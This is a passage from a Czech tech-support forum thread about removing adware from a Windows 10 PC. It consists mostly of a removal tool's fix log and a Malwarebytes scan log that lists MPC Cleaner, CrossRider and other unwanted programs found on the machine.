"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{21431663-23D7-40F6-A415-22673F2E0617}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{24D2CEAB-ED2E-4B9F-AAE2-8AECBD6D9F1F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{24D2CEAB-ED2E-4B9F-AAE2-8AECBD6D9F1F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3338E8A2-41E8-48F3-B771-DF917BA886FF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3338E8A2-41E8-48F3-B771-DF917BA886FF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{56BEF496-DE23-4FC9-B86F-9168B79EA5DD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{56BEF496-DE23-4FC9-B86F-9168B79EA5DD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{69AC9BBD-9EB4-4F3B-8F18-9E52ECE2BF73}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{69AC9BBD-9EB4-4F3B-8F18-9E52ECE2BF73}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8AE63F37-E3BB-487B-A3E9-89E4E1F3D437}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8AE63F37-E3BB-487B-A3E9-89E4E1F3D437}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8B7CBE50-1EFE-4DCC-A26C-A6526401CE28}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B7CBE50-1EFE-4DCC-A26C-A6526401CE28}" => key removed successfully
C:\WINDOWS\System32\Tasks\Test TimeTrigger => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Test TimeTrigger" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8DA0916B-D6EF-41AC-848E-4E56BFEDC356}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8DA0916B-D6EF-41AC-848E-4E56BFEDC356}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B80AEAC9-2D84-4293-8EA5-73407A8471BB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B80AEAC9-2D84-4293-8EA5-73407A8471BB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C06087C5-D73B-4ECB-9E1D-E5267F81C592}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C06087C5-D73B-4ECB-9E1D-E5267F81C592}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ED898442-2CFF-46BD-907B-F32299346882}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ED898442-2CFF-46BD-907B-F32299346882}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F0D5C121-195F-4001-9B8B-5650699451C7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F0D5C121-195F-4001-9B8B-5650699451C7}" => key removed successfully
C:\WINDOWS\System32\Tasks\{04090E47-0E7A-0A09-0A11-7D7A0905110D} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{04090E47-0E7A-0A09-0A11-7D7A0905110D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F89990A0-E2B2-449B-9189-935D0BFBEDBA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F89990A0-E2B2-449B-9189-935D0BFBEDBA}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ConfigFree Startup Programs => key not found.
C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => moved successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => moved successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core.job => moved successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA.job => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\mbot_gb_014010252 => value removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending" => key removed successfully
HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced" => key removed successfully
HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing" => key removed successfully
HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending" => key removed successfully
HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced" => key removed successfully
HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing" => key removed successfully
HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}" => key removed successfully
HKCR\CLSID\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} => key not found.
HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}" => key removed successfully
"HKCR\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}" => key removed successfully
C:\Program Files (x86)\Skype\Toolbars => moved successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}" => key removed successfully
"HKCR\PROTOCOLS\Handler\skypec2c" => key removed successfully
"HKCR\CLSID\{91774881-D725-4E58-B298-07617B9B86A8}" => key removed successfully
HKCR\Wow6432Node\PROTOCOLS\Handler\skypec2c => key not found.
"HKCR\Wow6432Node\CLSID\{91774881-D725-4E58-B298-07617B9B86A8}" => key removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/VirtualEarth3D,version=4.0" => key removed successfully
Chrome DefaultSearchURL => removed successfully
Chrome DefaultSuggestURL => removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl" => key removed successfully
"C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx" => not found.
HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome.Administrator\shell\open\command\\Default => value restored successfully
c2cautoupdatesvc => Unable to stop service.
c2cautoupdatesvc => service removed successfully
c2cpnrsvc => Unable to stop service.
c2cpnrsvc => service removed successfully
idsvc => service removed successfully
C:\Users\Administrator\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini => moved successfully

"C:\Users\Administrator\AppData\Local\Temp" folder move:

Could not move "C:\Users\Administrator\AppData\Local\Temp" => Scheduled to move on reboot.


Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 2016-04-27 19:46:05)

C:\Users\Administrator\AppData\Local\Temp => moved successfully

==== End of Fixlog 19:46:12 ====

[Rudy]

Smazáno. Nastala nějaká změna?

[boutek]

Chromium bohuzel nezmizelo a porad se automaticky spousti po startu pc. A porad nejde v settings odinstalovat. Jakysi MPC cleaner, ktery se mi tenkrat objevil v pc spolecne s Chromium, je take stale na plose, ale uz se sam nespousti. Vse ostatni je OK.

[Rudy]

Udělejte kompletní sken MBAM: http://www.malwarebytes.org/mbam.php a dejte log. Předem nic nemažte.

[boutek]

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 29/04/2016
Scan Time: 21:02
Logfile: malware.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.04.29.06
Rootkit Database: v2016.04.17.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Administrator

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 511548
Time Elapsed: 53 min, 47 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 3
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe, 2412, , [9cfeb8fcc0d9ac8aff831cdc6c95d828]
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCTray.exe, 9772, , [eeacbdf7cecbc274186a0eea59a8837d]
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCTray64.exe, 3056, , [4f4b5361bcdd59dd2a58d4249170bb45]

Modules: 42
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\LpcManager.dll, , [1288268e5f3ae1553e4488704eb34fb1],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\LpcManager.dll, , [1288268e5f3ae1553e4488704eb34fb1],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\WinService.dll, , [b2e8dada2178ab8b5f23e41458a9ad53],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\XProcessBus.dll, , [9901625255443df9730f05f37190aa56],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\XProcessBus.dll, , [9901625255443df9730f05f37190aa56],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Report.dll, , [bddd377d12871e18bcc6c92ff60b48b8],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Report.dll, , [bddd377d12871e18bcc6c92ff60b48b8],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\XBus.dll, , [cbcf07ad5b3e76c0384ac137b9482fd1],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\TrayFrame.dll, , [0991753f1584a393daa8b74138c92ed2],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Monitor.dll, , [4159a3112d6c60d6087a98609869e51b],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Database.dll, , [84163d77792093a37b07ad4bd22fb34d],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\LogReport.dll, , [54461e962f6a9d99a7dbc335c53cd729],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\BrowserPlugIn.dll, , [4159a50f55447bbb7c06a94f0bf6768a],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Cleaner.dll, , [a7f39f15732645f186fcdd1b08f901ff],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\SafeProtect.dll, , [b2e8b3011a7f66d04042a94ff50cd22e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Update.dll, , [4c4ec0f4d2c71224f58d16e224dd08f8],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Web.dll, , [6238dfd5eaafca6cc1c18870dc2510f0],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\SafeNavi.dll, , [4753367ebbdeda5cfc866296d72a5ba5],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\SafeNavi.dll, , [4753367ebbdeda5cfc866296d72a5ba5],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\SafeNavi.dll, , [4753367ebbdeda5cfc866296d72a5ba5],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\AdbWinApi.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\AdbWinUsbApi.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\AndriodServer.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Support.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Support.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Utility.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Utility.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\XSkin.dll, , [25759222d9c00f279875d7d05fa5b24e],

Registry Keys: 19
PUP.Optional.MorePowerfulCleaner, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\MPCProtectService, , [9cfeb8fcc0d9ac8aff831cdc6c95d828],
PUP.Optional.MorePowerfulCleaner, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\MPCKpt, , [4654981c78218ea8b9949866e71afa06],
PUP.Optional.SearchManager.ChrPRST, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\bahkljhhdeciiaodlkppoonappfnheoi, , [3c5e8e26afea57df53ec6d44966e0cf4],
PUP.Optional.CinemaPlus, HKLM\SOFTWARE\WOW6432NODE\CinemaDPV2-nv, , [3565fcb83a5f62d446b566f370939a66],
PUP.Optional.TornTV, HKLM\SOFTWARE\WOW6432NODE\TheTorntv V10-nv, , [91098b299dfcb1856a271840b54f24dc],
PUP.Optional.SearchManager.ChrPRST, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\bahkljhhdeciiaodlkppoonappfnheoi, , [8d0dc9eb0c8d24124ff003ae9d676898],
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{1472721B-1A67-4554-B6F4-F59EE96AB5D4}, , [38624b69e9b0ef47ae43111cec1802fe],
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{21111111-1111-1111-1111-110111271147}, , [26743480aaef0d29975a55d8f410bf41],
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{60148E35-AAAA-45B5-BD55-82E0497640BD}, , [4e4cd6def4a523131ed4e34aaa5a5fa1],
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{9E0ECEFB-D773-45FB-B360-BBCD6DBD497A}, , [33675f552c6dea4cc82b74b98e76c53b],
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{C46D4DD9-1290-49A5-B72A-0E70F153A3E7}, , [65352f857a1f41f510e32eff9d67fe02],
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{CADE6B52-521F-481D-8964-D0E08688A1E4}, , [b6e44371bddc51e5bc357cb127dd48b8],
PUP.Optional.MorePowerfulCleaner, HKLM\SOFTWARE\WOW6432NODE\MPC, , [019974406a2f1e18acdaddd1996bce32],
Rogue.AntivirusAntiSpyware2011, HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\AntiVirus AntiSpyware 2011, , [0892872dcacf6acc62b74f11778dce32],
PUP.Optional.InstallCore, HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\csastats, , [bcde357f3366b08650cb98208084f808],
PUP.Optional.BoBrowser, HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\CLIENTS\STARTMENUINTERNET\BoBrowser.GYCJOA7MAAOBLEVAANIRAP7PBI, , [c9d13f758c0d65d184e63562ca3a21df],
PUP.Optional.SearchManager.ChrPRST, HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\bahkljhhdeciiaodlkppoonappfnheoi, , [b7e3d9dbdabf6ec873f5e2d5d92b02fe],
PUP.Optional.OneSystemCare, HKU\S-1-5-21-4246815794-1745546178-596238576-501\SOFTWARE\ONE SYSTEM CARE, , [a6f4714326730d2988d78fb7e51f25db],
PUP.Optional.SystemHealer, HKU\S-1-5-21-4246815794-1745546178-596238576-501\SOFTWARE\SYSTEM HEALER, , [009a2490edac56e0f95c64329371cb35],

Registry Values: 17
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{1472721b-1a67-4554-b6f4-f59ee96ab5d4}|AppName, HDvid Codec V6.0-bg.exe, , [38624b69e9b0ef47ae43111cec1802fe]
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{21111111-1111-1111-1111-110111271147}|AppName, Deal Boat-bg.exe, , [26743480aaef0d29975a55d8f410bf41]
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{60148e35-aaaa-45b5-bd55-82e0497640bd}|AppName, HDvid Codec V6.0-buttonutil.exe, , [4e4cd6def4a523131ed4e34aaa5a5fa1]
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{9e0ecefb-d773-45fb-b360-bbcd6dbd497a}|AppName, HDvid Codec V6.0-codedownloader.exe, , [33675f552c6dea4cc82b74b98e76c53b]
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{c46d4dd9-1290-49a5-b72a-0e70f153a3e7}|AppName, CinemaDPV2-codedownloader.exe, , [65352f857a1f41f510e32eff9d67fe02]
PUP.Optional.CrossRider, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{cade6b52-521f-481d-8964-d0e08688a1e4}|AppName, CinemaDPV2-bg.exe, , [b6e44371bddc51e5bc357cb127dd48b8]
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|HDvid Codec V6.0-bg.exe, 8000, , [21792b892a6ffd39364ec9eb28dc2ad6]
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|CinemaDPV2-bg.exe, 8000, , [6535565e7920e650ed972f8527dd946c]
PUP.Optional.MorePowerfulCleaner, HKLM\SOFTWARE\WOW6432NODE\MPC|Location, C:\Program Files (x86)\MPC Cleaner, , [019974406a2f1e18acdaddd1996bce32]
PUP.Optional.MorePowerfulCleaner, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\MPCKPT|Description, MPC Driver, , [1f7bcee64158b77fe4a3e8c6ab5935cb]
PUP.Optional.MorePowerfulCleaner, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\MPCPROTECTSERVICE|ImagePath, "C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe", , [5545fbb9c9d0c2744d19e1cef90b1ae6]
PUP.Optional.BoBrowser, HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\REGISTEREDAPPLICATIONS|BoBrowser.GYCJOA7MAAOBLEVAANIRAP7PBI, Software\Clients\StartMenuInternet\BoBrowser.GYCJOA7MAAOBLEVAANIRAP7PBI\Capabilities, , [009a169eabee62d4e58691062ed6ed13]
PUP.Optional.OneSystemCare, HKU\S-1-5-21-4246815794-1745546178-596238576-501\SOFTWARE\ONE SYSTEM CARE|OSID, 6.2, , [a6f4714326730d2988d78fb7e51f25db]
PUP.Optional.OneSystemCare, HKU\S-1-5-21-4246815794-1745546178-596238576-501\SOFTWARE\ONE SYSTEM CARE|AdvertsLink1, http://dl.softservers.net/121002163/DriverPro.exe, , [f4a6496bacedab8b66f8ff4721e34cb4]
PUP.Optional.OneSystemCare, HKU\S-1-5-21-4246815794-1745546178-596238576-501\SOFTWARE\ONE SYSTEM CARE|AdvertsLink2, http://od.onesaveservers.net/291002163/OneSaveSetup.exe, , [b4e6a70d7722f93d98c6b88eff05cc34]
PUP.Optional.SystemHealer, HKU\S-1-5-21-4246815794-1745546178-596238576-501\SOFTWARE\SYSTEM HEALER|HomePage, http://systemhealer.com/, , [009a2490edac56e0f95c64329371cb35]
PUP.Optional.SystemHealer, HKU\S-1-5-21-4246815794-1745546178-596238576-501\SOFTWARE\SYSTEM HEALER|SupportPage, http://systemhealer.com/support/#contact, , [c0da991b8c0dfa3cf560f0a65ca87f81]

Registry Data: 0
(No malicious items detected)

Folders: 35
PUP.Optional.MorePowerfulCleaner, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC, , [9901714390092a0c506d822411f337c9],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Exe, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Config, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Config\DB, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Drivers, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SgIcon, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin, , [25759222d9c00f279875d7d05fa5b24e],
